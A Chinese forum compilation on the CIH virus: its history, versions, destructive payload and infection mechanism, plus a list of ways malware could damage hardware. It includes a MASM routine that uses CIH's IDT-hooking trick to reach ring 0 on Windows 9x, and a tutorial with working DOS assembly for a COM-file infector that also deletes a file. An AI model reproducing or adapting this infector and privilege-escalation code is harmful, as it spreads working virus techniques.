如果汇编可移植性差，那cih有何以破坏大量电脑。

著名的cih病毒(cih病毒是发现的首例直接破坏计算机系统硬件的病毒。) 藏王 发表于 2005-3-18 21:04:24 cih病毒的由来 cih首先在**被发现,根据台北官方的报告,计算机病毒是由24岁的陈盈豪（chen ing-halu）编制的,由于其名字第一个字母分别为c、i、h，所以这可能是计算机病毒名称的由来。 -------------------------------------------------------------------------------- cih病毒的简介 它是迄今为止发现的最阴险的病毒之一。它发作时不仅破坏硬盘的引导区和分区表，而且破坏计算机系统flashbios芯片中的系统程序，导致主板损坏。cih病毒是发现的首例直接破坏计算机系统硬件的病毒。 -------------------------------------------------------------------------------- cih病毒的发展历程 cih病毒v1.0版本： 最初的v1.0版本仅仅只有656字节，其雏形显得比较简单，与普通类型的病毒在结构上并无多大的改善，其最大的"卖点"是在于其是当时为数不多的、可感染microsoft windows pe类可执行文件的病毒之一， 被其感染的程序文件长度增加，此版本的cih不具有破坏性。 cih病毒v1.1版本： 当其发展到v1.1版本时，病毒长度为796字节，此版本的cih病毒具有可判断winnt软件的功能，一旦判断用户运行的是winnt，则不发生作用，进行自我隐藏，以避免产生错误提示信息，同时使用了更加优化的代码，以缩减其长度。此版本的cih另外一个优秀点在于其可以利用win pe类可执行文件中的"空隙"，将自身根据需要**成几个部分后，分别插入到pe类可执行文件中，这样做的优点是在感染大部分winpe类文件时， 不会导致文件长度增加。 cih病毒v1.2版本： 当其发展到v1.2版本时，除了改正了一些v1.1版本的缺陷之外，同时增加了破坏用户硬盘以及用户主机 bios程序的代码，这一改进，使其步入恶性病毒的行列，此版本的cih病毒体长度为1003字节。 cih病毒v1.3版本： 原先v1.2版本的cih病毒最大的缺陷在于当其感染zip自解压包文件(zip self-extractors file)时，将导致此zip压缩包在自解压时出现： winzip self-extractor header corrupt. possible cause: d**k or file transfer error. 的错误警告信息。v1.3版本的cih病毒显得比较仓促，其改进点便是针对以上缺陷的，它的改进方法是：一旦判断开启的文件是winzip类的自解压程序，则不进行感染。同时，此版本的cih病毒修改了发作时间。v1.3 版本的cih病毒长度为1010字节。 cih病毒v1.4版本： 此版本的cih病毒改进上上几个版本中的缺陷，不感染zip 自解压包文件，同时修改了发作日期及病毒中的版权信息(版本信息被更改为："cih v1.4 tatung"，在以前版本中的相关信息为"cih v1.x ttit")，此版本的长度为1019字节。 从上面的说明中，我们可以看出，实际上，在cih的相关版本中，只有v1.2、v1.3、v1.4这3 个版本的病毒具有实际的破坏性，其中v1.2版本的cih病毒发作日期为每年的4月26日，这也就是当前最流行的病毒版本，v1.3 版本的发作日期为每年的6月26日，而cih v1.4版本的发作日期则被修改为每月的26日，这一改变大大缩短了发作期限，增加了其的破坏性。 -------------------------------------------------------------------------------- cih的特征和行踪 来自权威部门的消息说，cih是一个纯粹的windows95/98病毒，这个病毒很独特地使用了 windowsvxd（虚拟设备驱动程序）技术；该病毒发作时，硬盘一直转个不停，所有数据都被破坏，硬盘分区信息也将丢失；再有就是 cih病毒发作时也可能会破坏某些类型的主板上的电可改写只读存储器（e2prom）的bios。bios即电脑中的"基本输入/输出系统"， 存放的是系统最基本的硬件参数和驱动程序，一旦被破坏则系统根本无法启动，唯一的修复途径就是送回厂家重新烧入bios。此时如果用户不想送回厂家"重烧"，而使用bios升级软件重新烧入bios，升级软件将报告"e2prom型号不对"的错误。这就是说， cih病毒已具备了对硬件的相当破坏能力，它可以彻底摧毁计算机。 一般用户都知道，传统意义上的病毒破坏的是数据而非硬件。因此，经常进行数据备份与软件更新，能够一定程度上防止数据文件被病毒破坏，而且即使文件被传染病毒，也可使用反病毒软件加以清除，至少可以尽最大可能恢复系统。防病毒专家认为，威胁到计算机硬件的 cih的出现，意味着病毒与反病毒的技术较量已开始发生质的改变。 "根据初步跟踪分析，cih病毒是从海外传入内地的"北京冠群金辰软件有限公司反病毒专家王铁肩介绍说： "目前该病毒的传播主要通过互联网和电子邮件，当然随着时间的推移，其传播主要还是通过软盘或光盘。"据权威病毒搜集网获得的信息， cih病毒"原体"加"变种"一共有五种，它们的相互区别在于"原体"会使受感染文件增长，但不具破坏力；而"变种"不增长受感染文件，但有很强的破坏性，它们的发作时间分别为 4月26日、 6月26日和每月的26日。 -------------------------------------------------------------------------------- cih 病毒原理的应用--物理内存的读写 windows 95/98应用程序无法直接读写物理内存，如果使用vxd编程，可以调用vmm功能_mapphystolinear 将物理地址映射到线性地址再进行修改，但是这样就必须单独写一个vxd，比较麻烦，那么能不能在应用程序中直接调用vmm功能呢？一般不能，因为vmm功能要在ring 0上调用，而一般的应用程序工作在ring 3上，那么为什么cih 病毒能够调用vmm功能呢，cih病毒使用了一种技术，采用intel处理器的中断从ring 3转到ring 0，我们完全可以借鉴这种技术来调用vmm功能， 下面的程序演示了如何修改物理内存--以在windows 95加密程序中修改加密扇区大小（物理地址0000：0525h）为例： ;**************************************************************************** ;* windows 95加密软件核心模块之一－－磁盘扇区大小修改程序 * ;* * ;* 本程序在windows 95下修改内存物理地址0000:0525 处的磁盘扇区大小字节， * ;* 为了能够修改物理地址，本程序使用了vmm 功能_mapphystolinear将物理地址映射 * ;* 到线性地址进行修改。为了在应用程序中调用vmm 功能，本程序使用了cih 病毒的 * ;* 原理，使用中断将系统由ring 3转到ring 0，然后调用vmm 功能。 * ;* 本程序中的过程changesectorsize在vc中的原型可以写成： * ;* * ;* void _stdcall changesectorsize(byte sectorsize); * ;**************************************************************************** .386p .model flat,stdcall ;修改的中断号，如果本中断号改成3则可以防止soft-ice跟踪！ hookexceptionno equ 05h .data idtr_1 db 6 dup(0) ;保存中断描述符表寄存器 oldexceptionhook dd 0 ;保存原先的中断入口地址 .code ;修改扇区大小过程 changesectorsize proc sectorsize:byte push eax ;获取修改的中断的中断描述符（中断门）地址 sidt idtr_1 mov eax,dword ptr idtr_1+02h add eax,hookexceptionno*08h+04h cli ;保存原先的中断入口地址 push ecx mov ecx,dword ptr [eax] mov cx,word ptr [eax-04h] mov dword ptr oldexceptionhook,ecx pop ecx ;设置修改的中断入口地址为新的中断处理程序入口地址 push ebx lea ebx,newexceptionhook mov word ptr [eax-04h],bx shr ebx,10h mov word ptr [eax+02h],bx pop ebx ;执行中断，转到ring 0（与cih 病毒原理相似！） push ebx mov bl,byte ptr sectorsize ;扇区大小保存在bl寄存器中 int hookexceptionno pop ebx ;恢复原先的中断入口地址 push ecx mov ecx,dword ptr oldexceptionhook mov word ptr [eax-04h],cx shr ecx,10h mov word ptr [eax+02h],cx pop ecx ;修改扇区大小过程结束 sti pop eax ret changesectorsize endp ;新的中断处理程序 newexceptionhook proc push eax push ebx push ecx push edx push esi ;修改扇区大小 push dword ptr 00000000h ;必须为0 push dword ptr 00000001h ;字节数 push dword ptr 00000525h ;物理地址0000:0525 int 20h dd 0001006ch ;以上两条指令相当于 vmmcall _mapphystolinear pop esi pop esi pop esi mov byte ptr [eax],bl ;修改扇区大小 ;中断处理程序结束 pop esi pop edx pop ecx pop ebx pop eax iretd newexceptionhook endp end 本过程可以被c语言调用，编译方法：ml /c /coff w95enc.asm。请用masm 6.11以上版本编译，不需要ddk。将编译生成的obj文件插入vc的工程中，并在vc程序中写上函数原型说明，就可以调用了。 -------------------------------------------------------------------------------- 病毒是怎样破坏硬件的 最近，cih病毒把大家搞得人心惶惶，掀起了不小的波澜。以前的各种病毒最多只能破坏硬盘数据，而cih 却能侵入主板上的flash bios，破坏其内容而使主板报废。cih的教训告诉我们:不要轻视病毒对硬件的破坏。 很多人现在已经开始担忧:cih越来越凶猛，同时会不会有更多的破坏硬件的病毒出现？ 其实，本人分析了一下。病毒破坏硬件的"手段"，不外乎有以下几种： 1.破坏显示器 众所周知，每台显示器都有自已的带宽和最高分辨率、场频。早期生产的14英寸彩色显示器,带宽大约只有35-45mhz,对应的最高分辩率为1024×768@60hz场频；目前的14英寸彩色显示器，带宽大都有60mhz，对应的最高分辨率为1024×768@75hz场频；15英寸彩色显示器（高档的），带宽有110mhz，对应的最高分辨率为1280×1024@85hz场频。大家可以查看一下显示器的说明书，上面都有场频与最高分辨率的配合。若其中有一项超过，就会出现花屏，严重了就会烧坏显示器。病毒可以通过篡改显示参数来破坏显示器（如把分辨率、场频改到显卡能支持的最高档等）。虽然新型显示器有ddc标准化与系统联络，但病毒想钻空子并不难。所以大家如果发现在使用过程中显示器出现了花屏， 要立即关掉显示器的电源，重新启动后进入安全模式再找原因。 2.超外频、加电压破坏cpu、显卡、内存等 目前新型主板采用"软跳线"的越来越多,这正好给病毒以可乘之机。所谓"软跳线" 是指在bios中就能改动cpu的电压、外频和倍频。病毒可以通过改bios参数，加高cpu电压使其过热而烧坏，或提高cpu的外频，使cpu和显卡、内存等外设超负荷工作而过热烧坏。这类事件的前兆就是死机。所以，如果发现机器经常死机，就要赶紧到 cmos中看看以上参数是否有改动。可喜的是，目前很多新出的主板都有cpu温度监测功能，超温后立即降频报警，可以基本杜绝烧坏硬件的情况发生。 3.超"显频"破坏显卡 目前很多中高档显卡如voodoo等都可以手动改变其芯片的频率，并且改的方法更简单：在windows 9x注册表里改。病毒改动了"显频"，显卡也就容易超负荷工作而烧坏。这种事件的前兆也是死机。所以，死机时也不要忽视对"显频"的检查。另外还有一种减少烧坏显卡的可能性的办法，那就是……（什么？你已经安了两个风扇了！？） 4.破坏光驱 光驱中的光头在读不到信号时就会加大激光发射功率，这样长期下去对光驱的寿命极为不利。有人做实验，让正常的光驱不停的读取一张划痕很多，信号较弱的光盘，28小时以后光驱就完蛋了。病毒可以让光头走到盘片边缘无信号区域不停的读盘，结果光头读不到信号，便加大发射功率不停地读，要不了几天，光驱就要"no d**c"了。 所以要经常注意光驱灯的闪亮情况，判断光驱是否在正常工作。 5.破坏主板、显卡的flash bios 这就是现在的cih病毒破坏主板的方式。病毒用乱码冲掉了bios中的内容，使机器不能启动。 不过现在很多主板都有带有flash bios写保护跳线，可以有效的防止cih病毒破坏主板。但是不要忘了，很多显卡也有flash bios， 说不定哪一天就会冒出一种破坏显卡bios的病毒。所以还是小心一点为好，这可没有什么特效药啊！ 6.破坏硬盘 大家都知道，分区、高级格式化对硬盘都没有什么损伤，惟独低级格式化对硬盘的寿命有较大的影响。据说硬盘做上10次低级格式化就会报废。如果出现一种病毒，不停的对硬盘的0磁道做低格式化（做10次最多只需用几秒钟！），0道坏了再做1道……你的硬盘容量就会一点一点（这一点好不小啊！）地被蚕食，而且0、1、2……道坏了，要想再使用该硬盘，就得在bios中重新设定起始磁道，再低级格式化，非常麻烦。其实，该病毒有一个非常简单而有效的预防方法，那就是将bios中的boot sector virus protection（引导区病毒写保护）设为enable（打开）。笔者做过实验，将上述开关打开的情况下，使用各种低级格式化软件（包括bios中自带的）对硬盘进行低格，bios都会报警（报告说有程序企图重写引导区，问是否继续），按n就可以防止。要知道bios程序掌管着系统的最高控制权， 应该没有什么东西可以冲破其防线（你按y是另外一回事）。若发现上述情况，赶紧reset，然后进行杀毒不过，如果你是在装win 98等操作系统或system commander等软件时碰到该情况，就大可不必理会它，困为这些软件安装时都有要重写引导区。不过劝你安装这些软件时最好先把写保护关掉，否则容易出现死机现象！ 7.浪费喷墨打印机的墨水喷墨打印机的喷头特别容易堵塞，为此打印机公司特别发明了专门浪费墨水的"清洗喷头"功能，即让大量墨水冲出喷头，清除杂物。这项功能可以用软件控制实现，于是乎病毒便神不知鬼不觉的一次次调用该功能，而你却对打印机的呻吟声却听而不见。当你发现时，大量的墨已经被浪费了。这种病毒唯一的预防办法就是……不用打印机时把打印机关了。其实，只要你常注意一下打印机上的模式灯就可以了，清洗喷头时它通常是一闪闪的。另外还要仔细倾听它的呻吟声，清洗喷头时打印头总是要来回走动几下的（为了加热）。 一口气写了7条，其实大家心里明白，破坏硬件的歪点子多着呢！本文只是想为刚从cih阴影中爬出的朋友提个醒：成功之路千万条（当然是编病毒者的成功），**cih，还有后来者。千万要发扬各种精神， 保护你的血汗钱筑成的电脑！另外，本文中几乎每一条都有附预防办法（虽然有些看起来像废话），但这些办法也不是万能的（还要注意不能顾此失彼），以后谁的"鸡"若被新病毒搞坏了，我可不负责任哟！ cih是使用什么方法进行感染的？ 就技巧而言，其原理主要是使用windows的vxd(虚拟设备驱动程序)编程方法，使用这一方法的目的是获取高的cpu权限，cih病毒使用的方法是首先使用sidt取得idt base address(中断描述符表基地址)，然后把idt的int 3的入口地址改为指向cih自己的int3程序入口部分，再利用自己产生一个int 3指令运行至此cih自身的int 3入口程序 出，这样cih病毒就可以获得**别的权限(即权限0)，接着病毒将检查dr0寄存器的值是否为0，用以判断先前是否有cih病毒已经驻留。如dr0的值不为0，则表示cih病毒程式已驻留，则此cih副本将恢复原先的int 3入口，然后正常退出(这一特点也可以被我们利用来欺骗cih程序，以防止它驻留在内存中，但是应当防止其可能的后继派生版本)。如果判断dr0值为0，则cih病毒将尝试进行驻留，其首先将当前ebx寄存器的值赋给dr0寄存器，以生成驻留标记，然后调用int 20中断，使用vxd call page allocate系统调用，要求分配windows系统内存(system memory)，windows系统内存地址范围为c0000000h～ffffffffh，它是用来存放所有的虚拟驱动程序的内存区域， 如果程序想长期驻留在内存中，则必须申请到此区段内的内存，即申请到影射地址空间在c0000000h以上的内存。 如果内存申请成功，则接着将从被感染文件中将原先分成多段的病毒代码收集起来，并进行组合后放到申请到 的内存空间中，完成组合、放置过程后，cih病毒将再次调用int 3中断进入cih病毒体的int 3入口程序，接着调用int20来完成调用一个ifsmgr_installfilesystemapihook的子程序，用来在文件系统处理函数中挂接钩子，以截取 文件调用的操作，接着修改ifsmgr_installfilesystemapihook的入口，这样就完成了挂接钩子的工作，同时windows默认的ifsmgr_ring0_fileio(installablefilesystemmanager，ifsmgr)。服务程序的入口地址将被保留，以便于cih病毒调用，这样，一旦出现要求开启文件的调用，则cih将在第一时间截获此文件，并判断此文件是否为pe格式的可执行文件，如果是，则感染，如果不是，则放过去，将调用转接给正常的windows ifsmgr_io服务程序。cih 不会重复多次地感染pe格式文件，同时可执行文件的只读属性是否有效，不影响感染过程，感染文件后，文件的日期与时间信息将保持不变。对于绝大多数的pe程序，其被感染后，程序的长度也将保持不变，cih 将会把自身分成多段，插入到程序的空域中。完成驻留工作后的cih病毒将把原先的idt中断表中的int 3入口恢复成原样。 病毒的编写是一种高深技术，真正的病毒一般都具有：传染性、隐藏性（又称潜伏性）、破坏性。现在的病毒种类也不少，如平常的传染可执行文件的病毒、宏病毒等等。但原始的、破坏性最大的病毒还是传染可执行文件的病毒（像cih病毒），而这些病毒一般都是用汇编语言编写的。有许多人对病毒有着好奇和向往，但是往往又因为汇编语言的难学等问题望而却步。 这篇文章就是教给大家如何制作一个简单的程序，这个程序虽然算不上病毒但是具有病毒的传染性，而往往病毒的传染性是平常人最难做到的。 好啦，现在转入正题，先讲讲病毒是如何传染的，传染后又如何在被染的文件中执行的，其实道理非常简单：病毒一般将其代码写入执行文件的尾部，然后使执行文件在执行时先执行文件尾部的病毒代码，然后再跳回原代码处执行。现在举一个试例进行说明： ;----------------------------------------- ;功能：感染当前文件夹的test.com文件 ; 并删除当前文件夹的del.txt文件 ; 显示预设的字符串 cseg segment assume cs:cseg,ds:cseg,ss:cseg main proc near mainstart: call vstart ;病毒的代码开始处 vstart: pop si ;得到当前地址 mov bp,si ;保存当前地址 push si mov ah,9 add si,offset **-offset vstart ;显示预设字符串 mov dx,si int 21h pop si add si,offset yuan4byte-offset vstart ;取得原程序中的前四个字节 mov di,100h ;目的地址 mov ax,ds:[si] ;开始复制 mov ds:[di],ax inc si inc si inc di inc di mov ax,ds:[si] mov ds:[di],ax mov si,bp ;恢复地址值 mov dx,offset delname-offset vstart add dx,si mov ah,41h int 21h mov dx,offset filename-offset vstart ;得到文件名 add dx,si mov al,02 mov ah,3dh ;写文件 int 21h jc error mov bx,ax ;文件句柄 mov dx,offset yuan4byte-offset vstart ;读文件的前四个字节 add dx,si mov cx,4 mov ah,3fh int 21h mov ax,4202h ;到文件尾 xor cx,cx xor dx,dx int 21h mov di,offset new4byte-offset vstart ;保存要跳的地方 add di,2 add di,si sub ax,4 mov ds:[di],ax add si,offset mainstart-offset vstart ;准备写入病毒 mov dx,si mov vsizes,offset vends-offset mainstart mov cx,vsizes mov ah,40h int 21h mov si,bp ;定位到文件头 mov al,0 xor cx,cx xor dx,dx mov ah,42h int 21h mov ah,40h ;将新的文件头写入 mov cx,4 mov dx,offset new4byte-offset vstart add dx,si int 21h mov ah,3eh ;关闭文件 int 21h error: mov ax,100h push ax ret main endp yuan4byte: ret db 3 dup (?) vsizes dw 0 new4byte db ‘m‘,0e9h,0,0 filename db "test.com",0 delname db "del.txt",0 ** db "he he he he!" db 0dh,0ah,"$" vends: start: mov ax,cseg mov ds,ax mov ss,ax call main mov ax,4c00h int 21h cseg ends end start 以上就是一个简单的可以传染com文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何？？？不难吧。 附： com文件执行时将com文件内所的所有内容copy到内存， 起始地址是100，然后进行执行 没有任何有关节啦、段啦这些属性，所以com文件病毒是最简单最简单的病毒。 20210311